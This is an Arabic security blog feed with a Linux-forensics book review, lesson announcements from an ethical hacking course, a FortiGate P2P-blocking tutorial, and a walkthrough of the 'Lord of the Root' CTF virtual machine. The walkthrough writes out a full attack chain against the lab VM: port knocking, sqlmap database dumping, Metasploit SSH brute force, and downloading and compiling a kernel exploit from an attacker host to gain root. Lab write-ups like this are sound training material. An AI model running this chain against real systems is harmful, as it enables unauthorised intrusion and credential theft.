الفصل التاسع : يناقش بعض الامور المتقدمه لاختراق سيرفر لينكس ويضع سيناريو والشرح عليه ثم البدء بالتحليل بناء على السيناريو

الفصل العاشر : في هذا الفصل الكاتب اعطى مقدمه عن تحليل الملفات الخبيثه , قد يكون الكتاب مركز على لينكس وتحليل انظمه لينكس ولكن احيانا نجد ملفات خبيثه بعد تحليل النظام ويجب ان نكون على درايه ولو بالاساسيات عن استخراج معلومات من هذا الملف الخبيث والتي قد تقودنا الى امور اخرى تماما .

الفصل الحادي : عشر : مجرد ختام للكتاب وبعض النصائح والمصادر لمواصله المسيره في هذا المجال الرائع

 

بالنسبة لي شخصيا كان كتاب ممتع , انصحكم بقرائته .

رابط الكتاب على امازون 


مقال : حل تحدي Hack the Lord of the Root VM

$
0
0

تحدي أخر من تحديات Boot2Root والذي تم تحضيره بوساطة KoocSec لتمارين الإختراق. قام بتحضيره بمستوى اختبار OSCP خاصته. وهو مستوحى من فلم The Lord Of The Ring.

قم بتحميل VM من هنا

لنبدأ بالشرح

أولا, سوف نحدد هدفنا

netdiscover

هدفنا هو 192.168.1.5

الان سوف نستخدم اداة nmap لمعرفة المنافذ والبروتوكولات.

nmap –p- -A 192.168.1.5

النتيجة تظهر لنا بأن منفذ 22 مفتوح مع خدمة SSH. المنفذ 80 غير مفتوح وهذا يعني بانه لايمكننا فتح هذا السيرفر من خلال المتصفح.وبالتالي سوف نحاول ان نرى ماذا يملك المنفذ 22 ليقترحه,لنذهب الى terminal في كالي :

ssh 192.168.1.5

ظهرت رسالة “knock friend to enter” و “easy as 123” وسوف يطلب ايضا كلمة المرور التي لانعرفها لحد الأن. الان هذا يعتبر تلميح باتجاه port knocking. لنقم بالمحاولة:

nmap –r –Pn –p 1,2,3 192.168.1.5

خيارات االامر السابق :

r- : لمسح المنافذ كلها على التوالي.

Pn- : لمعاملة كل الـ hosts كـ online.
p- : لمسح منافذ معينة.
إستخدمنا المنافذ 1,2,3 للسهولة.

الأن قم بعمل مسح nmap. في هذه المرة نأمل بأن نملك اكثر من منفذ في النتيجة.

nmap –p- -A 192.168.1.5

وكما ترى يوجد اكثر من منفذ مفتوح بالمقارنة مع المسح السابق مثل منفذ 1337 وهو خدمة http وهذا ماأردناه بما ان منفذ 80 غير مفتوح.لنفتح Ip الهدف مع هذا المنفذ.

192.168.1.5:1337

يقوم بفتح صفحة بصورة واحدة. ولايوجد شئ  في الـ page source أيضا . لهذا استخدمت nikto هنا.

nikto –h 192.168.1.5:1337

 

كل مسار يظهر في نتيجة nikto غير مفيده . لهذا حاولت مع robots.txt الذي احاول به دائما بشكل افتراضي.

 

و بوووووووووووم ! كنت محقا وهاهي الصورة تفتح هنا. بالإضاافة لذلك قمت بالتحقق من page source.

 

في page source وجدت كود Base64 والذي قمت بفك تشفيره بإستخدام HackBar.

 

وسوف يعطيني النتيجة كما هو موضح بالأعلى لكن هنا سوف تكون الخدعة. سوف نقوم بالمزيد من فك التشفير لكن فقط من “L الى =” لانها base64 coded string. وبالمثل قم بالمزيد من فك التشفير.

 

وبناء على فك التشفير, تحصلنا على رابط ولنقم بفتحه.

 

نحن الأن وجها لوجه مع بوابة تسجيل الدخول. سأحاول تسجيل الدخول بإسم مستخدم وكلمة مرور عشوائيتين لكن هذه العملية ستؤدي الى تسجيل الكوكيز بواسطة BurpSuite.

بعد ما سجلنا الكوكيز سوف نحاول إستخدامها في خطوتنا التالية, وعلى سبيل المثال sqlmap. الأن لنجمع قاعدة بيانات لمعرفة اسم المستخدم وكلمة المرور لهذا قررت إستخدام sqlmap.

والأمر الذي إستخدمته هو :

sqlmap -u http://192.168.1.5:1337/978345210/index.php –forms –batch –crawl=10 –
cookie=ibf29bpuc0864gmfobpdsg0pu0 –level=5 –risk=3 –dbs

عندما تقوم بتنفيذ هذا الأمر سوف يسألك 3 أسئلة.جاوب على السؤالين الأولين بكلمة no وبكلمة yes على السؤال الثالث.

 

عندها سوف يبدا بجمع قاعدة البيانات

 

 

وأخيرا سوف يظهر لك قاعدة البيانات لأسماء المستخدمين وكلمات المرور.

 

الأن يجب حفظ قاعدة البيانات هذه في ملفين نصيين مختلفين. وإستخدامهم في ssh log in attack بمساعدة هجوم Brute force. ولتنفيذ هذا الهجوم, توجه الى terminal في كالي وقم بفتح ميتاسبلويت بإستخدام الأمر msfconsole واكتب ايضا:

use auxiliary/scanner/sh/shh_login
set rhosts 192.168.1.5
set user_file /root/Desktop/user
set pass_file /root/Desktop/pass
 exploit

والنتيجة ستظهر لك اسم المستخدم وكلمة المرور الصحيحتين, وعلى سبيل المثال: smeagol:MyPreciousR00t

الأن قم بالدخول عبر ssh بإستخدام اسم المستخدم وكلمة المرور هذه.

ssh smeagol@192.168.1.5

وقم بإدخال كلمة المرور عندما تطلب.وعندما تدخل قم بكتابة الأمر التالي لمعرفة نسخة kernal الحالية.

lsb_release -a

 

النسخة هي 14.04 ولحسن الحظ لدينا إستغلال لهذه النسخة. في terminal قم بالبحث عن الإستغلال المناسب :

searchsploit ubuntu 14.04

 

الإستغلال الذي سنستخدمه هنا هو 39166.c ومن اجل إستخدام هذا الإستغلال يجب ان نحمله و نعمل compile له وسنكتب الأمر التالي:

wget http://192.168.1.18/39166.c
 gcc 39166.c –o shell

الأمر الأول سوف يحمل الإستغلال والأمر الثاني سوف يعمل compile ويحفظه في ملف اسمه shell. الأن يجب ان نعطي صلاحية لل shell وفي النهاية يجب علينا ان نشغله.

chmod 777 shell
.//shell

تنفيذ ملف shell سوف يأخذك للروت وللموافقة قم بإستخدام الأمر التالي:

whoami

ولندخل الأن في مجلد الرووت ولنرى ماذا تحتوي:

cd /root
 ls

هنا, وجدنا ملف نصي بإسم flag وهو هدفنا. دعونا لانضيع الوقت ولنبدأ بقراته.

cat Flag.txt

 

المقالة الأصلية (Hack the Lord of the Root VM (CTF Challenge

دورة مهارات الهاكر الأخلاقي : الدرس الثالث عشر ( تصدير نتائج فحص اداة nmap )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

بالتاكيد بعد متابعتك للدرس السابق الخاص بالـ Port Scanning اصبحت تعرف الكثير من الامور الخاصه بفحص المنافذ وكذلك اداة Nmap .

في هذا الدرس سوف نتعرف على كيفية حفظ النتائج من اداة nmap وتصديرها الى ملف خارجي والاستفاده من الملف لمشاريع اخرى تعتمد على الفحص الناتج من اداة Nmap .

 

 

تحميل المواد النصيه 

دورة مهارات الهاكر الأخلاقي : الدرس الرابع عشر ( استخدام اداة netcat في اختبار الاختراق )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

في هذا الدرس سوف نتعلم الكثير من الامور الخاصه باداة netcat والتي يجب على كل مختبر اختراق ان يعرفها .

 

 

تحميل المواد النصيه

دورة مهارات الهاكر الأخلاقي : الدرس الخامس عشر ( مقدمه عن vulnerabilities analysis )

$
0
0

نعود لكم هذه المرة بدورة مُتكاملة مُقدمة من مركز تدريبات iSecur1ty أردنا أن نطرحها بشكل مجاني بالكامل على مُجتمع iSecur1ty ، إتخذنا هذا القرار لكي نُشارككم التجربة التدريبية التي نقدمها في مركز التدريبات من خلال دورة متكاملة تكون كمدخل رئيسي لكم في مجال إختبار الإختراق والهاكر الأخلاقي ، حيث قمنا ببناء هذه الدورة بالإعتماد على منهجية PTES العالمية لإختبار الإختراق.

انتهينا من ثلاث وحدات في الدوره , سوف نبدا بدرس اليوم الوحده الرابعه من الكورس والتي تركز على vulnerabilities analysis .

في هذا الدرس سوف نناقش مجموعه من المصطلحات المهمه التي لها علاقه بـ vulnerabilities analysis ونتحدث عن بعض الادوات التي يمكن استخدامها .

 

 

مرفقات الدرس

مقال : حجب برامج التحميل (P2P) في الشبكه باستخدام FortiGate

$
0
0

 

في هذه الدرس سوف نوضح الخطوات اللازمه لحجب ترايفك برامج P2P , سوف  سنستخدم خيار  Application Control في الفورتي جيت لمراقبة application traffic على الشبكة خاصتك وبعدها سوف نقوم بحجب البينات الغير مرغوبة بشكل إنتقائي 

الخطوات كالتالي :

1. تفعيل application control و Multiple security profiles :


إذهب الى system>feature select وتاكد من ان application contrtol و multiple security profiles مفعلين

 

2. إستخدام application control profile الإفتراضي لمراقبة بينات الشبكة:


application control profile الإفتراضي يكون معد لمراقبة كل التطبيقات ماعدا التطبيقات المجهولةسوف تستخدم هذا الـ profile لمراقبة البيانات وتحديد هوية اي تطبيق نريد بحجب الترايفك الخاص به.

أذهب الى security profiles> application control و قم بعرض profile الإفتراضي.

قم بالتأكد من أن كل categories تم ضبطها للمراقبة مع إستثناء التطبيقات المجهولة.

 

3. تعديل السياسة الأمنية من أجل البيانات الخارجة:


إذهب الى policy & objects ثم الى ipv4 policy  و قم بتعجيل السياسة التي تسمح بالإتصال من الشبكة الداخلية الى الأنترنت.

تحت security profiles, قم بتشغيل application control وإستخدم الـprofile الإفتراضيلفحص جميع البيانات, يجب ضبط SSL/SSH inspection الى deep-inspection profile.

4. مراجعة Fortiview dashboards : 


إذهب الىFortiview ثم الى applications وقم بتحديد now لعرض بيانات الشبكة المتدفقة عبر جهاز FortiGate المدرجة كتطبيق.

تستطيع رؤية بيانات P2P التي تمر خلال شبكتك.

قم بالصغط على اي تطبيق لعرض المعلومات, وتشمل مصادر بيانات الشبكة, وجهة البيانات و معلومات حول الجلسات المنفردة.

5. إنشاء application profile لحجب تبطيقات P2P :


في الخطوة السابقة , application control قام بكشف بيانات الشبكة من BitTorrent, والذي يعتبر تطبيق P2P للتحميل.في هذه الخطوة, سوف نقوم بأنشاء  application control profile لحجب جميع برامج P2P.

إذهب الىsecurity profile ثم الى application control و أنشأ profile جديد.

إضبط P2P الى الحجب (block) .

 

6. إضافة profile المحجوب الى السياسة الأمنية:


إذهب الى Policy & objects ثم ipv4 Policy وقم بتعديل السياسة التي تسمح بالتواصل من الشبكة الداخلية الى الأنرنت.

قم بضبط application control ليستخدم الـ profile الجديد.

7. النتيجة:


قم بحاولة الدخول الى موقع BitTorrent. سوف تظهر رسالة FortiGuard تحذيرية تفيد بأن التطبيق تم حجبه.

قم بإختبار حجب P2P بمحاولة إستخدام تطبيق BitTorrent. بيانات الشبكة محجوبة.

لإظهار معلومات حول البيانات المحجوبة, إذهب الى FortiView ثم applications , إختر 5 minutes ,وقم بفلترة البيانات بإستخدام Security Action:Blocked.

المصدر 

Viewing all 466 articles
Browse latest View live


Latest Images